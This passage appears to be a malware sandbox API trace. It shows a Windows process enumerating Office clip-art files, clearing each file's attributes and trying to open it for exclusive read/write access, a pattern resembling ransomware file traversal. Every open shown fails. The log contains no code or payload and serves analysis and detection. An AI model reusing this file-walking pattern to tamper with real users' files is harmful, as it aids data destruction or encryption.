Office\\CLIPART\\PUB60COR\\BS01080_.WMF", dwFileAttributes=0x80) returned 0 [0133.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.945] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.946] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.946] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF", dwFileAttributes=0x80) returned 0 [0133.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.947] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.947] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.947] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF", dwFileAttributes=0x80) returned 0 [0133.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.947] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.947] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.947] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF", dwFileAttributes=0x80) returned 0 [0133.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.948] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.948] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.948] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.948] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF", dwFileAttributes=0x80) returned 0 [0133.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.949] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.949] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.949] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.949] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF", dwFileAttributes=0x80) returned 0 [0133.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.949] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.949] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.949] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.949] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF", dwFileAttributes=0x80) returned 0 [0133.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.950] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.950] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.950] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.950] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF", dwFileAttributes=0x80) returned 0 [0133.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.950] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.950] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.951] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.951] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID", dwFileAttributes=0x80) returned 0 [0133.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.951] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.951] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.951] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.951] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF", dwFileAttributes=0x80) returned 0 [0133.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.952] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.952] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.952] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.952] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF", dwFileAttributes=0x80) returned 0 [0133.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.953] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.953] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.953] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.953] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.953] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF", dwFileAttributes=0x80) returned 0 [0133.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.954] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.954] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.954] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.954] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF", dwFileAttributes=0x80) returned 0 [0133.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.955] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.955] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.955] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.955] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID", dwFileAttributes=0x80) returned 0 [0133.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.956] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.956] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.956] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF", dwFileAttributes=0x80) returned 0 [0133.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.957] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.957] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.957] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.957] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF", dwFileAttributes=0x80) returned 0 [0133.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.958] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.958] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.958] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.958] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF", dwFileAttributes=0x80) returned 0 [0133.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.959] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.959] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.959] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.959] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF", dwFileAttributes=0x80) returned 0 [0133.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.960] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.960] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.960] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.960] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF", dwFileAttributes=0x80) returned 0 [0133.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.961] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.961] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.961] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.961] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.961] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF", dwFileAttributes=0x80) returned 0 [0133.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.962] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.962] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.962] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF", dwFileAttributes=0x80) returned 0 [0133.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.962] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.963] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.963] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.963] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF", dwFileAttributes=0x80) returned 0 [0133.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.964] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.964] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF", dwFileAttributes=0x80) returned 0 [0133.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.964] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.964] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.964] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.964] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF", dwFileAttributes=0x80) returned 0 [0133.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.965] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.965] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF", dwFileAttributes=0x80) returned 0 [0133.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.965] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.965] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF", dwFileAttributes=0x80) returned 0 [0133.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.966] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.966] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF", dwFileAttributes=0x80) returned 0 [0133.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.967] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.967] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.967] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF", dwFileAttributes=0x80) returned 0 [0133.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.968] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF", dwFileAttributes=0x80) returned 0 [0133.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.968] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.969] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF", dwFileAttributes=0x80) returned 0 [0133.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.969] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.969] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 